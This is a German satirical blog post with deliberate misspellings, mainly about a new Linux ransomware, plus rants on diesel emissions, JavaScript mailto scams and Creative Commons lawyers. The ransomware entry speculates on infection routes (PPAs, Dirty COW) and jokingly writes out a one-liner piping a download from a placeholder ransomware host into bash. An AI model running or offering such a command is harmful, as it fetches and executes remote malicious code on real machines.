Was habe ich darauf gewartet!

Unter linux gibt es kein ausreichenden softwäjhr-angebot? Das ändert sich. ENDLICH gibt es erpressungstrojaner auch für linux-sörver!!!1!elf!!

Bleibt nur eine offene frage: das ding braucht offensichtlich root-rechte, um sich über GRUB melden zu können. Wie kann man einem linux-sörver einen trojaner unterjubeln. Ich sehe da (bei debianoiden systemen) folgende möglichkeiten:

  • PPAs wurden gepwnt. Der admin ist eine schlafmütze und hat PPAs auf einem sörver eingetragen, die dann halbautomatisch sein system mitwarten. (Die alternative ist es, kwelltextpakete nach abgleich der prüfsumme selbst zu kompilieren.) Das bildschirmfoto zeigt einen unbuntu-GRUB, deshalb scheint mir ein PPA gar nicht unwahrscheinlich zu sein.
  • Fiese debian-fehler, die bei der unnötigen umstellung des paketmänätschments aufgetreten sind, wurden ausgebeutet.
  • Über irgendeine kombinazjon verschiedener „kleiner“ fehler, die ein admin aus furcht vor problemen auch mal völlig ungefixt lässt, kam es zur rechteausweitung und zur ausführung von kohd mit root-rechten. Etwa, wenn es durch einen fehler in websörver oder in einer darauf laufenden anwendung möglich geworden ist, kohd mit den rechten des websörvers auszuführen, um dann dirty COW zu benutzen, um root zu kriegen.

Wie es auch sei, eines wirkt dumm an diesem trojaner: warum handelt es sich um die linux-variante eines windohs-schädlings. Gerade ein un*xoides betrübssystem macht es im grunde sehr einfach, einen derartigen trojaner zu schreiben. Sogar die implementazjon in einem shellskript wäre bekwem möglich. Kurz: die leute, die das gemacht haben, sind vermutlich ein bisschen dumm. Dabei braucht nicht einmal eine temporäre datei (die bei einer analyse den privaten schlüssel verraten und eine entschlüsselung ermöglichen könnte) auf einem datenträger abgelegt zu werden, es gibt doch pipes:

# curl -L http://get.ransomware.example.com/?for=some_id | bash

Un*xoide betrübssysteme haben eben ihre ganz eigene eleganz… :mrgreen:

Aber: welche schlafmütze von admin hat keine bäckups vom sörver? Oh… 😦

Aber die jagd ist eröffnet. Inzwischen haben ja doch so einige ganz normale anwender ein linux-system als desktoprechner, und viele von ihnen dürften sich sehr sicher fühlen, weil sie ja nicht dieses gefährliche windohs benutzen und deshalb alle vorsicht fahren lassen… da wird die überraschung dann böse, wenn beim hochfahren auf dem bildschirm „gib mir bitcoin, oder du siehst deine daten nie wieder“ steht.

Lasst euch kein antivirus-schlangenöl für linux aufschwatzen! Die scheiße funkzjoniert schon unter windohs nicht und reißt tendenzjell eher noch größere sicherheitslöcher auf. Lernt lieber etwas über den kompjuter, den ihr benutzt, klickt nicht auf alles, was sich anklicken lässt und seht zu, dass ihr immer ein aktuelles system habt. Die beste antivirus-softwäjhr ist das gehirn.

„Saubere“ dieselmotoren des tages

Na, grünenwähler und sonstige idjoten mit halbbildungshintergrund! Seid ihr auf die reklame reingefallen, dass dieselmotoren jetzt durch tolle neue zaubertechnik so richtig sauber, klima und umwelt geworden sind? Ist schon doof, wenn man doof ist, keine naturwisschaftliche allgemeinbildung hat und glaubt, dass ein professjoneller lügner wie ein reklameheini in seiner reklame die wahrheit erzählt.

Studie zu Abgaswerten
Diesel-Pkw belasten Umwelt stärker als Lkw

Ihr könnt ja demnächst auf elektroautos umsteigen, der strom ist ja sauber und die steckdose stinkt nicht. Könnt ja dran riechen, wenn ihrs nicht glaubt. Gruß auch an bummskanzlerin Angela Merkel, die einen atomausstieg mit dem abbau und der verfeuerung von braunkohle gestaltet hat. (Und natürlich mit abriss- und endlagerkosten, die am ende doch aus steuermitteln bezahlt werden.) Müsst ihr unbedingt CDU wählen, ist fast so grün wie die grünen! :mrgreen:

Javascript des tages

Die verbrecher halten die nutzer von Mäcks offenbar für so blöd, dass sie einfach über javascript in irgendwelchen drexsites immer wieder neue mailto:-links öffnen, um den nutzer dazu zu bringen, eine telefonnummer anzurufen. Die nummer steht dann im betreff der neu geöffneten mäilfenster und damit auch im fenstertitel. Ich will es mal so sagen: wer auf solche „überredungskünste“ hin zum telefon greift, gehört nicht zu den hellsten leuchten im lampenladen.

Was gegen solche lästigen überrumpelungen auf dem niwoh eines achtjährigen kindes (und gegen viel richtige internetz-kriminalität) hilft? Ganz einfach: nicht jeder dahergelaufenen drexseit die ausführung von javascript im brauser gestatten. Aber man kann es natürlich auch wie äppel machen und jedes symptom einer unsicheren und dummen grundeinstellung einzeln behandeln… 😦

Gar nicht auszudenken, wie sehr vor fläsch gewarnt worden wäre, wenn dieses mikrohäckchen mit fläsch gemacht worden wäre. Aber so, wo es javascript ist, braucht man mit keinem wort auf die ursache hinzuweisen. Scheiß äppelgekaufter scheißjornalismus!

Der übliche abmahnistanwahn

Hat wirklich jemand geglaubt, dass lizenzierungen der marke „creative commons“ ein gutes mittel gegen die legalisierte wegelagerer-abzockerei unter dem banner des „geistigen eigentumes“ ist? Nun, in der bummsrepublik abmahnistan haben sich stinkende anvergewälte schon gut darauf eingestellt und einen tollen wörkflow zum abzocken entwickelt. Also passt immer auf, dass den lizenzbedingungen entsprochen wird, wenn ihr CC-lizenziertes zeug verwendet. (Ist ja auch nicht so schwierig, aber einfach übernehmen, was man „sowieso für frei“ hält, ist halt einfacher — gar nicht auszudenken, was hier los ist, wenn in der BRD erst „geistiges eigentum“ auf den S/M-seits von abmahnanvergewälten durchgesetzt wird. Da wird das fratzenbuch aber zur unerschöpflichen goldgrube für ansonsten untalentierte juristen mit empatiemangel und asozjaler energie.)

Und wenn ihr etwas gegen den scheißdreck des „geistigen eigentums“ tun wollt, veröffentlicht eure sachen nicht unter CC-lizenzen, außer vielleicht als CC0. Das ist aber mit einer aufgabe sämtlicher rechte verbunden und damit oft auch nicht gewünscht.